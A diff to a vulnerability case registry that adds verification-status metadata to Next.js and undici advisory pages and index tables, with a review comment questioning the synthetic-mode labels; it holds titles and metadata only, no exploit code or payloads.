## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2025-49826` - Canonical ID: `nextjs--CVE-2025-49826`


@@ -8,6 +8,10 @@ updated_date: "2026-02-04T04:35:34.538107Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-xv57
# Next.js Content Injection Vulnerability for Image Optimization # Next.js Content Injection Vulnerability for Image Optimization
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2025-55173` - Canonical ID: `nextjs--CVE-2025-55173`


@@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:50:08.291668Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-g5qg
# Next.js Affected by Cache Key Confusion for Image Optimization API Routes # Next.js Affected by Cache Key Confusion for Image Optimization API Routes
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2025-57752` - Canonical ID: `nextjs--CVE-2025-57752`


@@ -8,6 +8,10 @@ updated_date: "2026-02-04T04:20:45.658010Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -34,6 +38,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-4342
# Next.js Improper Middleware Redirect Handling Leads to SSRF # Next.js Improper Middleware Redirect Handling Leads to SSRF
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2025-57822` - Canonical ID: `nextjs--CVE-2025-57822`


@@ -8,6 +8,10 @@ updated_date: "2026-02-10T01:28:46.973023Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-9g9p
# Next.js self-hosted applications vulnerable to DoS via Image Optimizer remotePatterns configuration # Next.js self-hosted applications vulnerable to DoS via Image Optimizer remotePatterns configuration
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2025-59471` - Canonical ID: `nextjs--CVE-2025-59471`


@@ -8,6 +8,10 @@ updated_date: "2026-02-06T13:13:43.709252Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-5f7q
# Next.js has Unbounded Memory Consumption via PPR Resume Endpoint # Next.js has Unbounded Memory Consumption via PPR Resume Endpoint
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2025-59472` - Canonical ID: `nextjs--CVE-2025-59472`


@@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:46:38.768104Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -48,6 +52,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-5j59
# Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up # Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--GHSA-5j59-xgg2-r9c4` - Canonical ID: `nextjs--GHSA-5j59-xgg2-r9c4`


@@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:45:15.823345Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -43,6 +47,15 @@ primary_source: "https://github.com/facebook/react/security/advisories/GHSA-fv66
# Next.js is vulnerable to RCE in React flight protocol # Next.js is vulnerable to RCE in React flight protocol
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--GHSA-9qr9-h5gf-34mp` - Canonical ID: `nextjs--GHSA-9qr9-h5gf-34mp`


@@ -8,6 +8,10 @@ updated_date: "2026-02-13T00:43:52.836085Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -48,6 +52,15 @@ primary_source: "https://github.com/facebook/react/security/advisories/GHSA-83fc
# Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components # Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--GHSA-h25m-26qc-wcjf` - Canonical ID: `nextjs--GHSA-h25m-26qc-wcjf`


@@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:55:54.855562Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -49,6 +53,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-mwv6
# Next Vulnerable to Denial of Service with Server Components # Next Vulnerable to Denial of Service with Server Components
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--GHSA-mwv6-3258-q52c` - Canonical ID: `nextjs--GHSA-mwv6-3258-q52c`


@@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:51:40.627151Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -47,6 +51,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-w37m
# Next Server Actions Source Code Exposure # Next Server Actions Source Code Exposure
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--GHSA-w37m-7fhw-fmv9` - Canonical ID: `nextjs--GHSA-w37m-7fhw-fmv9`


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -26,6 +30,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -26,6 +30,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `14` - 总案例数: `14`
- 近 30 天新增/更新: `7` - 近 30 天新增/更新: `7`
- 重点 Markdown 案例数: `14` - 重点 Markdown 案例数: `14`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `14`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -25,19 +29,19 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| Undici has Unbounded Memory Consumption in WebSocket permessage-deflate Decompression | `low` | `generated` | `official` | `2026-03-13T20:54:25.563997Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1526.md) | | Undici has Unbounded Memory Consumption in WebSocket permessage-deflate Decompression | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T20:54:25.563997Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1526.md) |
| Undici has Unhandled Exception in WebSocket Client Due to Invalid server_max_window_bits Validation | `low` | `generated` | `official` | `2026-03-13T20:54:26.149214Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-2229.md) | | Undici has Unhandled Exception in WebSocket Client Due to Invalid server_max_window_bits Validation | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T20:54:26.149214Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-2229.md) |
| Undici has CRLF Injection in undici via `upgrade` option | `low` | `generated` | `official` | `2026-03-13T20:54:25.572106Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1527.md) | | Undici has CRLF Injection in undici via `upgrade` option | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T20:54:25.572106Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1527.md) |
| Undici has Unbounded Memory Consumption in its DeduplicationHandler via Response Buffering that leads to DoS | `low` | `generated` | `official` | `2026-03-13T20:54:25.417862Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-2581.md) | | Undici has Unbounded Memory Consumption in its DeduplicationHandler via Response Buffering that leads to DoS | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T20:54:25.417862Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-2581.md) |
| Undici: Malicious WebSocket 64-bit length overflows parser and crashes the client | `low` | `generated` | `official` | `2026-03-14T09:17:45.838435Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1528.md) | | Undici: Malicious WebSocket 64-bit length overflows parser and crashes the client | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-14T09:17:45.838435Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1528.md) |
| Undici has an HTTP Request/Response Smuggling issue | `low` | `generated` | `official` | `2026-03-14T09:19:54.772219Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1525.md) | | Undici has an HTTP Request/Response Smuggling issue | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-14T09:19:54.772219Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1525.md) |
| Undici has an unbounded decompression chain in HTTP responses on Node.js Fetch API via Content-Encoding leads to resource exhaustion | `low` | `generated` | `official` | `2026-02-04T02:56:17.456091Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-22036.md) | | Undici has an unbounded decompression chain in HTTP responses on Node.js Fetch API via Content-Encoding leads to resource exhaustion | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:56:17.456091Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-22036.md) |
| undici Denial of Service attack via bad certificate data | `low` | `generated` | `official` | `2026-02-06T22:08:08.311705Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2025-47279.md) | | undici Denial of Service attack via bad certificate data | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-06T22:08:08.311705Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2025-47279.md) |
| Use of Insufficiently Random Values in undici | `low` | `generated` | `official` | `2026-02-04T02:29:26.373390Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2025-22150.md) | | Use of Insufficiently Random Values in undici | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:29:26.373390Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2025-22150.md) |
| Undici's fetch with integrity option is too lax when algorithm is specified but hash value is in incorrect | `low` | `generated` | `official` | `2025-11-04T19:44:42Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2024-30261.md) | | Undici's fetch with integrity option is too lax when algorithm is specified but hash value is in incorrect | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-11-04T19:44:42Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2024-30261.md) |
| Undici's Proxy-Authorization header not cleared on cross-origin redirect for dispatch, request, stream, pipeline | `low` | `generated` | `official` | `2025-11-04T19:44:28Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2024-30260.md) | | Undici's Proxy-Authorization header not cleared on cross-origin redirect for dispatch, request, stream, pipeline | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-11-04T19:44:28Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2024-30260.md) |
| Undici's cookie header not cleared on cross-origin redirect in fetch | `low` | `generated` | `official` | `2026-02-04T02:35:56.289390Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2023-45143.md) | | Undici's cookie header not cleared on cross-origin redirect in fetch | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:35:56.289390Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2023-45143.md) |
| undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect | `low` | `generated` | `official` | `2026-02-04T03:02:08.652391Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2022-31151.md) | | undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:02:08.652391Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2022-31151.md) |
| ProxyAgent vulnerable to MITM | `low` | `generated` | `official` | `2026-03-13T22:15:23.541247Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2022-32210.md) | | ProxyAgent vulnerable to MITM | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T22:15:23.541247Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2022-32210.md) |


@@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:02:08.652391Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-q768-
# undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect # undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2022-31151` - Canonical ID: `undici--CVE-2022-31151`
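Review bot: The new front matter asserts `verification_mode: "synthetic"` and `artifact_mode: "synthetic"` while `verification_status` is `triage-manual`, `last_run_id` is empty, and the rendered status block in the same file reports 浏览器证据 `missing` and Run Bundle `-`, so the mode fields record an intention rather than evidence. Anyone filtering the registry on `verification_mode == synthetic` will pull in cases that were never executed in any form, which defeats the purpose of labelling synthetic results. I would leave the mode fields empty until a run exists — `verification_mode: ""` and `artifact_mode: ""` alongside `last_run_id: ""` — and have the renderer derive them from the run bundle, or introduce a separate `planned_mode` key if a default is needed for scheduling. The same pattern is stamped on every case page in this commit, so the change belongs in the generator rather than the individual files; the front-matter block starts before this hunk.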


@@ -8,6 +8,10 @@ updated_date: "2026-03-13T22:15:23.541247Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -30,6 +34,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-pgw7-
# ProxyAgent vulnerable to MITM # ProxyAgent vulnerable to MITM
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2022-32210` - Canonical ID: `undici--CVE-2022-32210`


@@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:35:56.289390Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -31,6 +35,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-q768-
# Undici's cookie header not cleared on cross-origin redirect in fetch # Undici's cookie header not cleared on cross-origin redirect in fetch
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2023-45143` - Canonical ID: `undici--CVE-2023-45143`


@@ -8,6 +8,10 @@ updated_date: "2025-11-04T19:44:28Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-m4v8-
# Undici's Proxy-Authorization header not cleared on cross-origin redirect for dispatch, request, stream, pipeline # Undici's Proxy-Authorization header not cleared on cross-origin redirect for dispatch, request, stream, pipeline
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2024-30260` - Canonical ID: `undici--CVE-2024-30260`


@@ -8,6 +8,10 @@ updated_date: "2025-11-04T19:44:42Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-9qxr-
